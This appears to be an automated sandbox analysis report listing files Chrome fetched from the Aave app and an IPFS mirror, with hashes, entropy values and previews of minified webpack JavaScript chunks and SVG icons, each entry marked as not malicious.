                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):196
                                                                                                                                                                                                                                                  Entropy (8bit):4.603497047332822
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YPgbVHJH0pXZVz+ZXxAinVd5pDH2Rl2yXdH+wzREXKRZPudN+fHKlK0dWvV:YobgUxAinVd5paRl2y1+wzRbZWmCllK
                                                                                                                                                                                                                                                  MD5:12B4A6931C806FF3D5368EBAE0956D98
                                                                                                                                                                                                                                                  SHA1:335B0D1903AFA357D3C4B67B94B913D34A8AC9FE
                                                                                                                                                                                                                                                  SHA-256:0E7E9D077DD692036B7188C2ADCA2613C704C4F886DDCBFF9E22AE719921DB27
                                                                                                                                                                                                                                                  SHA-512:0BC4EFD03D9D38F548913DD28DD2FFE60BD95D8016312F487000369E117B2505F13E6B6D509283BECD3410A5DE13429D421D9BCFD00DCDD49B971CDD7B9EF4C9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"jsonrpc":"2.0","id":"0","error":{"code":-32603,"message":"{\"request_id\":\"dd96ed0708\", \"details\":\"error processing the request: error parsing relay: error unmarshalling relay as json\"}"}}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30804), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):30804
                                                                                                                                                                                                                                                  Entropy (8bit):5.5601823009693
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ayP66F6xI8VecZU+tJI7OzgetRQiGRGnhFvFUfb2VzclJGbk:SD3eD+DIazvEh
                                                                                                                                                                                                                                                  MD5:073C1C301C982B9533D7EB9940F54565
                                                                                                                                                                                                                                                  SHA1:0D7016C67E5AB8B590C4ACF11169FE8D85583BC5
                                                                                                                                                                                                                                                  SHA-256:EB68866B6A0AEE35B9EAC63DA3D51379D26262CFD5C8ED12207929E652F81911
                                                                                                                                                                                                                                                  SHA-512:8EEA025BD30127DD676BFB9B75910774AE479B98A5B7EB51016B823A73B549FF93383D0AED735B7D9B34BB19F7D4775E0CE1B76B91F405B477C9BDEC5AD00C72
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/9287.367ffb9426ce0802.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9287,6504],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),s=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","cl
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13906), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):13906
                                                                                                                                                                                                                                                  Entropy (8bit):5.4663568406518985
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:A7CoTpcO9I8QmaTohCsrWkJU2xbzxpozwsW1:A7CouO98mQohCsbJU2/onW1
                                                                                                                                                                                                                                                  MD5:8D1F977FD82709CE4AD7E20726C52A9D
                                                                                                                                                                                                                                                  SHA1:4B235975E256D6392FB149BFB432D3420E92F163
                                                                                                                                                                                                                                                  SHA-256:3A9136BC8E2EF8CE010043C0F98F6444DCF3D408D85A1390DD9D7559990D7BC4
                                                                                                                                                                                                                                                  SHA-512:021FD2153B1CA1E442206F0124872760B86A710185BDEC23DD30261BC4F251D27C295946545590E848FE5170F550F17D7522C43ECBCB5A9A6F6400E54C6A43A4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9689.adbfca89f0e04259.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9689],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){return d}});var r=n(59499),o=n(4730),a=n(49501),s=n(81902),i=n(58527),c=n(85893),l=["capType"];function p(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function u(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?p(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):p(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var d=function(e){var t=e.capType,n=(0,o.Z)(e,l),r=t===s.R.supplyCap?(0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):203708
                                                                                                                                                                                                                                                  Entropy (8bit):3.826088104351986
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:zPgKNNJN86P5X208vLO9GINgxZhrRd51AlKDNXyadBYcOwg2oe6SeKqKTiq7Iq35:LgK/T5m7jajNgnh2eXOXrhqx8rzniowx
                                                                                                                                                                                                                                                  MD5:37EC3238EE9D47F7F0BFADE3868709E3
                                                                                                                                                                                                                                                  SHA1:D215C949078205B0CD56AB51CB519AFFB98F3D13
                                                                                                                                                                                                                                                  SHA-256:222B4FF6D02318E891A67E42E635897578F703C87F958C4C1D64FDB45D5550C5
                                                                                                                                                                                                                                                  SHA-512:EF213F8EDDF6165ED892EA3B8C51DA649CB478D7F6EBE67C0E6B36265716F519347BA218F41749120D50DE2D473B35203A10117B4701F514D7F0673436C76F21
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/flags/es.svg
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M21.87-1.413H-2.167v16.826H21.87V-1.413Z" fill="#C60B1E"/><path d="M21.87 2.794H-2.167v8.413H21.87V2.793Z" fill="#FFC400"/><path d="M3.217 6.064s-.016 0-.025-.006a.38.38 0 0 1-.036-.034l-.022-.017-.02-.03s-.022-.04-.013-.071c.01-.03.029-.04.045-.05.016-.01.052-.021.052-.021s.028-.013.036-.013a.428.428 0 0 1 .041-.01s.01-.007.02-.011c.01-.004.022-.004.029-.006.006-.004.026-.007.035-.01l.052.003.052.004.07-.004c.013 0 .023-.004.036 0l.048.013.068.027c.016.007.058.013.074.021.02.01.029.023.039.038.01.013.01.027.012.037a.065.065 0 0 1 0 .038c-.004.01-.016.027-.016.027l-.02.034-.026.02s-.02.017-.032.017-.16-.03-.257-.03a1.179 1.179 0 0 0-.242.034Z" fill="#AD1519"/><path d="M3.72 6.072c-.003 0-.003 0 0 0-.005 0-.012-.004-.025-.004-.048-.007-.157-.028-.23-.028-.091 0-.232.028-.244.03-.004 0-.02 0-.026-.006a.29.29 0 0 1-.038-.034l-.023-.017-.02-.03c0-.004-.025-.044-.012-.074.013-.033.032-.044.048-.054a.266.266 0 0
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18695), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):18695
                                                                                                                                                                                                                                                  Entropy (8bit):5.302518817662126
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:mzWvsZkx5Q5eR3AN14v0evZk9NMj1zQZuZrBXetbi2UMMxqJEYMVlqJzsCweVaV5:mzWvs+amu14v0evKSNQ3bioMxcMvusl
                                                                                                                                                                                                                                                  MD5:6F5120901E484CA4E1458367C70834AB
                                                                                                                                                                                                                                                  SHA1:B61E6C9A758F0CB72B3EBFB248652E797C67754F
                                                                                                                                                                                                                                                  SHA-256:EE8C161C52EA10BE82EBAE25D55ACD9F768798866F659BEA2A17F7971FC4FB06
                                                                                                                                                                                                                                                  SHA-512:4BE3F1F3E0B84F884C41091F27CA5C4904403B51D8FB59882EF9449ACB723BDB8DA98479E23AEC37652D0624655582701D980F154AADB1F16C8A8A407E2F2EC7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5559],{15446:function(e,n,t){"use strict";t.d(n,{O:function(){return i}});var r=t(30120),o=t(64288),a=t(85893),i=function(e){var n=e.children;return(0,a.jsx)(r.Z,{sx:{display:"flex",flexDirection:"column",flex:1,mt:{xs:"-32px",lg:"-46px",xl:"-44px",xxl:"-48px"}},children:(0,a.jsx)(o.Z,{children:n})})}},3765:function(e,n,t){"use strict";t.d(n,{p:function(){return l}});var r=t(49501),o=t(75084),a=t(5152),i=t(26074),c=t(78371),s=t(57609),u=t(85893),p=(0,a.default)((function(){return Promise.resolve().then(t.bind(t,58294)).then((function(e){return e.WalletModal}))}),{loadableGenerated:{webpack:function(){return[58294]}}}),l=function(e){var n=e.funnel,t=(0,i.q)().setWalletModalOpen,a=(0,c.Y)((function(e){return e.trackEvent}));return(0,u.jsxs)(u.Fragment,{children:[(0,u.jsx)(o.Z,{variant:"gradient",onClick:function(){a(s.Bp.CONNECT_WALLET,{funnel:n}),t(!0)},children:(0,u.jsx)(r.cC,{id:"Connect wallet"})}),(0,u.jsx)(p,{})]})}},41024:fu
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (34946), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):34946
                                                                                                                                                                                                                                                  Entropy (8bit):5.457354235629065
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:jAgViStNCbjImH+/fcHzR/tcHSHtcoycy70U7JMmWY4KkpS:jmbjIA2cHRtcHvlJMmWY9b
                                                                                                                                                                                                                                                  MD5:554846BAB685802E13EF376DE1DF527E
                                                                                                                                                                                                                                                  SHA1:70EF4F1124A4D5D2F927CA756B3DB4D2D2D2EF0E
                                                                                                                                                                                                                                                  SHA-256:C9E7A50C0D326089BDAE0E1C09B3569893B3537086B17DAF5AA1DB47B77332F2
                                                                                                                                                                                                                                                  SHA-512:9F36DB07AD639BA0A80537B6EAB4A9D7047C7B66EFBB052A78B13916F99505D9451BCDDEBF6F13FF47B76E17A38112822CB4BB5532BF296BA239C98E2EACCEB7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/staking-1d754d08e785ffe6.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8879],{26814:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return be}});var i=n(17674),o=n(49501),a=n(75331),r=n(56365),s=n(30120),l=n(29630),c=n(79072),d=n(9144),x=n(75084),u=n(81645),h=n(5151),p=n(56371),m=n(5152),v=n(67294),j=n(59499),f=n(4730),b=n(70918),k=n(90149),g=n(41024),y=n(68861),w=n(72667),Z=n(58527),C=n(77912),A=n(78371),S=n(85893),T=function(e){var t,n,a,r,c,d,x,u,h,p=e.stakedToken,m=e.icon,v=(0,A.Y)((function(e){return e.currentMarketData})),j="",f=(0,C.I)(v).data;if(f&&Array.isArray(f)){var b=(0,i.Z)(f,4);d=b[0],x=b[1],u=b[2],h=b[3]}"AAVE"==p&&(j=(null===(t=d)||void 0===t?void 0:t.stakeApy)||"0"),"ABPT"==p&&(j=(null===(n=x)||void 0===n?void 0:n.stakeApy)||"0"),"GHO"==p&&(j=(null===(a=u)||void 0===a?void 0:a.stakeApy)||"0"),"ABPT V2"==p&&(j=(null===(r=h)||void 0===r?void 0:r.stakeApy)||"0");var k=Date.now()/1e3>Number(null===(c=u)||void 0===c?void 0:c.distributionEnd);return(0,S.jsxs)(s.Z,{sx:functi
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (24489), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):24489
                                                                                                                                                                                                                                                  Entropy (8bit):5.302562550123366
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:yyPmovZoN9gXBv6+G0L+bTdt7+kKehydkJhLs+C0H4N/zJBfGbYsfY:yyP7vQ9gdF+bpt7+kv8GhLs+Z4VznfGc
                                                                                                                                                                                                                                                  MD5:48B63577B27E3FBFEACFB7E56FFC30CB
                                                                                                                                                                                                                                                  SHA1:7E10BC7D22CDD5D9CEBF1A00929EE1D6DE5BD146
                                                                                                                                                                                                                                                  SHA-256:92DE443F13C05C9AD18599E5A00AB4D67F86BC8221376E9D3EA526CB0840C007
                                                                                                                                                                                                                                                  SHA-512:DB7A183901225AEC25871777E9674228E0366EA910F0F6C964C16A3B2D206D5106E201B75F891B132E6235A6F9269211E748C170B9B9288C45FB196A0237A162
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6782],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),c=r(94780),s=r(81719),u=r(78884),l=r(36622),p=r(34867);function f(e){return(0,p.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (37092), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):37092
                                                                                                                                                                                                                                                  Entropy (8bit):5.492485737849444
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:WpvgSTvkRGyPZaveJNlpwCR8XiyeMqbUWnUQrlxuTjYhNg1vH7:uBI7xaWP3R878GD
                                                                                                                                                                                                                                                  MD5:9DD24BA9B7F5400405CE618C67C0F1D9
                                                                                                                                                                                                                                                  SHA1:6F8D6C274A7B3FF78982C0C6DD704F58EA499F58
                                                                                                                                                                                                                                                  SHA-256:32D9B79028F1323232B4195FB693D199121C6C149DD9B0D18861719D0ED07727
                                                                                                                                                                                                                                                  SHA-512:C4F11D1109BBAEA8495B3FB4E0BCE457DD16BFBAC203A933AAF4722014FAAB7360AC3C461581B855D875C0648EE0BE500BE35505FA04AAEDE53ADF0D53D25F48
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2431],{75158:function(e,r,t){t.d(r,{Z:function(){return O}});var n=t(63366),a=t(87462),o=t(67294),s=t(86010),i=t(94780),c=t(41796),u=t(37743),l=t(54235),d=t(85893),p=(0,l.Z)((0,d.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 14l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"}),"CheckBox"),h=(0,l.Z)((0,d.jsx)("path",{d:"M19 3H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm-2 10H7v-2h10v2z"}),"IndeterminateCheckBox"),f=t(36622),v=t(78884),x=t(81719),y=t(34867);function g(e){return(0,y.Z)("MuiCheckbox",e)}var A=(0,t(1588).Z)("MuiCheckbox",["root","checked","disabled","indeterminate","colorPrimary","colorSecondary"]);const b=["checkedIcon","color","icon","indeterminate","indeterminateIcon","inputProp
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (22367), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):22367
                                                                                                                                                                                                                                                  Entropy (8bit):5.489160286211997
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:c6yPm/pvQtTvqEU2jZDIg3hALLyRFMUqnIJlYT/EAVd4bNK:c6yPIpvQtTvqEUAZDd6LyRFMH2sn4hK
                                                                                                                                                                                                                                                  MD5:782665BD82C1D3B722C101B35C6889F4
                                                                                                                                                                                                                                                  SHA1:3DC73F0703B9227E81D52270C59F1A024B7FD7E1
                                                                                                                                                                                                                                                  SHA-256:CE860F5F222A2CB7F2E2F218DBBABB9EB955CB531A2B3DAC9F6A0F303FE815D6
                                                                                                                                                                                                                                                  SHA-512:233C94A5C8E89069B556E2B8E3124C2EC923D0B9C2CD317BF4F53A4524F9C2EE6DCB9DF437FAAADB77DB88C5ACB873C1293053BFC2EFB5B6428E53A4C6F2E6A7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/503.5217c75933b76bbc.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[503],{21386:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"M9 16.17 5.53 12.7a.9959.9959 0 0 0-1.41 0c-.39.39-.39 1.02 0 1.41l4.18 4.18c.39.39 1.02.39 1.41 0L20.29 7.71c.39-.39.39-1.02 0-1.41a.9959.9959 0 0 0-1.41 0L9 16.17z"}),"CheckRounded");r.Z=i},62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),a=t(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=i},75158:function(e,r,t){t.d(r,{Z:function(){return Z}});var n=t(63366),o=t(87462),a=t(67294),i=t(86010),c=t(94780),s=t(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                                                                                                  Entropy (8bit):4.7861988241054
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                                                                                                                                                                                                  MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                                                                                                                                                                                                  SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                                                                                                                                                                                                  SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                                                                                                                                                                                                  SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31247), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):31247
                                                                                                                                                                                                                                                  Entropy (8bit):5.421289532846775
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:NyPI6P6BjOCykXONiX3ag7453qTopffYjXcf+:pBB6C3xj4hY
                                                                                                                                                                                                                                                  MD5:65530C93E8EAD446E49034B8461C6DAE
                                                                                                                                                                                                                                                  SHA1:BAF214C264549C8444E7D5ED07447747DD8D4CD3
                                                                                                                                                                                                                                                  SHA-256:0BB44921ADCA7646D97719E310D84A6DB7E089C4D3EF05FFB6AEF0584D032826
                                                                                                                                                                                                                                                  SHA-512:546687A03037B7893F7C80D0B04266A2DF197D241705920928AB8D29E936B77C849810EA8DB8484C29E3A0D0F27E713593E669FE9DB3E63693BA4ED8FB9A4F0F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[523],{62753:function(e,n,r){var t=r(64836);n.Z=void 0;var i=t(r(64938)),o=r(85893),s=(0,i.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=s},89722:function(e,n,r){r.d(n,{Z:function(){return h}});var t=r(87462),i=r(63366),o=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const x=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):853
                                                                                                                                                                                                                                                  Entropy (8bit):4.793868624189615
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tJFpu+byoUGSBq1KEVnSsxTKEVADesV/7/ucboDesV:ZaG5Vn5l34T/hboCu
                                                                                                                                                                                                                                                  MD5:B2D8F83525F694A7EB3DA04FE3F8DA65
                                                                                                                                                                                                                                                  SHA1:901B2CEC5B2F25DB3A495E6B000590DBFE40795B
                                                                                                                                                                                                                                                  SHA-256:DB4387BB50E8466CD3E147C0F62C3C434D914465E172C487A40BD2E2C439DC68
                                                                                                                                                                                                                                                  SHA-512:A3E58B3C15A956DE7967CFB67662CDB4FA4A5DAB244CB11758789E70CE491878FB0D18D0CA4B9BEE0735E718C2259198E0F520C51C75CFA06B655FAD95F56E17
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/tokens/aave.svg
                                                                                                                                                                                                                                                  Preview:<svg width="254" height="254" viewBox="0 0 254 254" fill="none" xmlns="http://www.w3.org/2000/svg"><circle cx="127" cy="127" r="127" fill="#9391F7" style="fill:color(display-p3 .5765 .5686 .9686);fill-opacity:1"/><path d="M103.39 133.194c10.89-1.768 18.285-12.03 16.518-22.92-1.768-10.89-12.03-18.285-22.92-16.518-10.89 1.768-18.285 12.029-16.518 22.92 1.768 10.89 12.03 18.285 22.92 16.518Zm52.213 0c10.89-1.768 18.285-12.03 16.517-22.92-1.767-10.89-12.029-18.285-22.919-16.518-10.89 1.768-18.286 12.029-16.518 22.92 1.768 10.89 12.029 18.285 22.92 16.518Z" fill="#fff" style="fill:#fff;fill-opacity:1"/><path d="M126.262 31.012c-54.241 0-98.218 44.814-98.203 100.077h25.088c0-41.415 32.475-74.994 73.115-74.994 40.64 0 73.116 33.579 73.116 74.994h25.088c.009-55.263-43.967-100.077-98.204-100.077Z" fill="#fff" style="fill:#fff;fill-opacity:1"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17529), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17529
                                                                                                                                                                                                                                                  Entropy (8bit):5.541923843793937
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:tqPQ7VeiHZenof4fOp9r4sRI7OzFNSmCOemzHahwEOVyX8:a8VecZUM5I7Oz3HzHahLX8
                                                                                                                                                                                                                                                  MD5:CB2F5662DB56903ECCADE944E65C622E
                                                                                                                                                                                                                                                  SHA1:059B7C473AAD2FBAB456E1BC1D274E141900C165
                                                                                                                                                                                                                                                  SHA-256:BA603331A85676C23095A823B0684200AD12ABDAF79D5DE2F53B1EF4B9258F56
                                                                                                                                                                                                                                                  SHA-512:4A5690043D3022800B58676CAEB92C28A6341B0A926BD38CAB0A817D1B45E3DB843F589615AFEB795630EE6A013661239458B39CB509534272E090F4ACD67285
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
